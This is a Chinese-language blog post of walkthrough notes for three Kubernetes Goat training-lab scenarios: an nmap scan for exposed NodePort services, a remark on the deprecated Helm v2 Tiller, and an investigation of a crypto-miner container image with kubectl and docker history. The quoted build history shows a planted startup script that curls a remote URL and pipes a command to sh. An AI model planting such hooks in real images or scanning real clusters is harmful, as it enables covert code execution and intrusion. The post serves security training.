Kubernetes Goat 08 & 09 & 10
categories: []
date: '2023-10-30T15:05:01.546413+08:00'
tags: []
title: Kubernetes Goat 08 & 09 & 10
updated: 2023-10-30T15:26:37.653+8:0
08:NodePort exposed services
NodePort 暴露的服务
nmap 192.168.72.129 -sT -p30000-32767
PORT STATE SERVICE
30003/tcp open amicon-fpsu-ra
09:Helm v2 tiller to PwN the cluster
Helm v2 tiller 风险
- 此方案已被弃用,供学习参考,环境默认是 Helm v3版本,可以安装Helm v2版本来实验
10:Analyzing crypto miner container
分析被部署挖矿软件的容器镜像
- 查看工作任务详情
kubectl describe job batch-check-job
- 获取
Pod信息
kubectl get pods --namespace default -l "job-name=batch-check-job"
- 获取
pod信息manifest并分析
kubectl get pod batch-check-job-gpfq4 -o yaml
- 找到镜像名称
- 通过
docker history查看镜像的构建历史记录
docker history --no-trunc madhuakula/k8s-goat-batch-check
- 看到执行的命令
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:cb43bcb572b74468336c6854282c538e9ac7f2efc294aa3e49ce34fab7a275c7 8 months ago CMD ["ps" "auxx"] 0B buildkit.dockerfile.v0
<missing> 8 months ago RUN /bin/sh -c apk add --no-cache htop curl ca-certificates && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup && rm -rf /tmp/* # buildkit 2.96MB buildkit.dockerfile.v0
<missing> 8 months ago LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat 0B buildkit.dockerfile.v0
<missing> 10 months ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 10 months ago /bin/sh -c #(nop) ADD file:5d673d25da3a14ce1f6cf66e4c7fd4f4b85a3759a9d93efb3fd9ff852b5b56e4 in / 5.57MB
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top
